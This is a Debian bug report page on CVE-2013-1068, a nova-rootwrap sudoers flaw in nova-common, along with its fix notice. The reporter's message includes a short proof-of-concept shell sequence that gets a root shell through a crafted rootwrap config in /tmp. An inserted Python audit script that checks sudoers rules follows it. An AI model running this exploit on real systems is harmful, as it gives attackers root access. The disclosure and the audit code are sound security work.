nova: CVE-2013-1068: local privilege escalation

Related Vulnerabilities: CVE-2013-1068  

Debian Bug report logs - #753579
nova: CVE-2013-1068: local privilege escalation

Reported by: Henri Salo <henri@nerv.fi>

Date: Thu, 3 Jul 2014 09:42:01 UTC

Severity: grave

Tags: confirmed, security

Found in version nova/2014.1.1-1

Fixed in versions nova/2012.1.1-18, nova/2014.1.1-4

Done: Thomas Goirand <zigo@debian.org>

Bug is archived. No further changes may be made.


Report forwarded to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#753579; Package nova-common. (Thu, 03 Jul 2014 09:42:05 GMT)


Acknowledgement sent to Henri Salo <henri@nerv.fi>:
New Bug report received and forwarded. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>. (Thu, 03 Jul 2014 09:42:05 GMT)


Message #5 received at submit@bugs.debian.org:

From: Henri Salo <henri@nerv.fi>
To: submit@bugs.debian.org
Subject: nova: CVE-2013-1068: local privilege escalation
Date: Thu, 3 Jul 2014 12:38:42 +0300
Package: nova-common
Version: 2014.1.1-1
Severity: grave
Tags: security, confirmed

After installing nova-common, the file /etc/sudoers.d/nova-common is created. If
/etc/sudoers contains "#includedir /etc/sudoers.d", nova is vulnerable to
CVE-2013-1068 local privilege escalation. The vulnerability does not need a working
OpenStack installation. If I am correct, OpenStack does not work without the
includedir configuration, so it might be usually enabled in OpenStack
instances.

PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019
"""
echo [DEFAULT] >/tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] >/tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
sudo nova-rootwrap /tmp/my-rootwrap.conf sh
id
"""

-- System Information:
Debian Release: 7.5
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
[signature.asc (application/pgp-signature, inline)]
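
An audit check for the condition the report describes, added here as an example (it is not code from the bug report or from the nova package): it scans sudoers text for `*-rootwrap` rules whose configuration file argument is not pinned to a root-owned path. The sample rules are constructed, since the page does not show the shipped sudoers file, and the `/etc/` trusted prefix is an assumption.

```python
import re

TRUSTED_PREFIXES = ("/etc/",)   # assumption: root-owned configuration tree
WILDCARDS = set("*?[")

# Constructed sample rules, not the contents of the Debian package's file.
SAMPLE = """\
# constructed sample
nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap
nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf *
cinder ALL = (root) NOPASSWD: /usr/bin/cinder-rootwrap /tmp/*.conf *
"""

def rootwrap_findings(sudoers_text):
    """Return (command, reason) for each rootwrap rule with an unpinned config path."""
    findings = []
    logical = sudoers_text.replace("\\\n", " ")        # join continuation lines
    for line in logical.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")) or "=" not in line:
            continue                                   # comments, includes, Defaults
        rhs = line.split("=", 1)[1]
        rhs = re.sub(r"\([^)]*\)", " ", rhs)           # drop Runas specs such as (root)
        rhs = re.sub(r"\b[A-Z_]+:", " ", rhs)          # drop tags such as NOPASSWD:
        for cmd in rhs.split(","):                     # escaped commas are not handled
            argv = cmd.split()
            if not argv or not argv[0].endswith("-rootwrap"):
                continue
            command = " ".join(argv)
            if len(argv) == 1:
                # A sudoers command without arguments matches any arguments,
                # so the caller chooses the config file and its filters_path.
                findings.append((command, "no arguments pinned: any config path accepted"))
            elif argv[1] == '""':
                continue                               # "" permits no arguments at all
            elif WILDCARDS & set(argv[1]):
                findings.append((command, "config path contains a wildcard"))
            elif not argv[1].startswith(TRUSTED_PREFIXES):
                findings.append((command, "config path outside trusted prefix"))
    return findings

if __name__ == "__main__":
    for command, reason in rootwrap_findings(SAMPLE):
        print(f"{command!r}: {reason}")
```

A pinned path only helps if the file, its directory and the `filters_path` directory it names are writable by root alone.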

Marked as fixed in versions nova/2012.1.1-18. Request was from Henri Salo <henri@nerv.fi> to control@bugs.debian.org. (Thu, 03 Jul 2014 10:30:07 GMT)


Reply sent to Thomas Goirand <zigo@debian.org>:
You have taken responsibility. (Thu, 03 Jul 2014 13:30:25 GMT)


Notification sent to Henri Salo <henri@nerv.fi>:
Bug acknowledged by developer. (Thu, 03 Jul 2014 13:30:25 GMT)


Message #12 received at 753579-close@bugs.debian.org:

From: Thomas Goirand <zigo@debian.org>
To: 753579-close@bugs.debian.org
Subject: Bug#753579: fixed in nova 2014.1.1-4
Date: Thu, 03 Jul 2014 13:19:37 +0000
Source: nova
Source-Version: 2014.1.1-4

We believe that the bug you reported is fixed in the latest version of
nova, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 753579@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand <zigo@debian.org> (supplier of updated nova package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Thu, 03 Jul 2014 20:25:51 +0800
Source: nova
Binary: python-nova nova-common nova-compute nova-compute-lxc nova-compute-uml nova-compute-qemu nova-compute-kvm nova-conductor nova-cert nova-scheduler nova-volume nova-api nova-network nova-console nova-consoleauth nova-doc nova-cells nova-baremetal nova-consoleproxy
Architecture: source all
Version: 2014.1.1-4
Distribution: unstable
Urgency: high
Maintainer: PKG OpenStack <openstack-devel@lists.alioth.debian.org>
Changed-By: Thomas Goirand <zigo@debian.org>
Description:
 nova-api   - OpenStack Compute - compute API frontend
 nova-baremetal - Openstack Compute - baremetal virt
 nova-cells - Openstack Compute - cells
 nova-cert  - OpenStack Compute - certificate manager
 nova-common - OpenStack Compute - common files
 nova-compute - OpenStack Compute - compute node
 nova-compute-kvm - OpenStack Compute - compute node (KVM)
 nova-compute-lxc - OpenStack Compute - compute node (LXC)
 nova-compute-qemu - OpenStack Compute - compute node (QEmu)
 nova-compute-uml - OpenStack Compute - compute node (UserModeLinux)
 nova-conductor - OpenStack Compute - conductor service
 nova-console - OpenStack Compute - console
 nova-consoleauth - OpenStack Compute - Console Authenticator
 nova-consoleproxy - OpenStack Compute - NoVNC proxy
 nova-doc   - OpenStack Compute - documentation
 nova-network - OpenStack Compute - network manager
 nova-scheduler - OpenStack Compute - virtual machine scheduler
 nova-volume - OpenStack Compute - storage metapackage
 python-nova - OpenStack Compute - libraries
Closes: 753579
Changes:
 nova (2014.1.1-4) unstable; urgency=high
 .
   * CVE-2013-1068: Fixed sudoers file (Closes: 753579).




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 01 Aug 2014 07:31:41 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 16:56:44 2019; Machine Name: beach
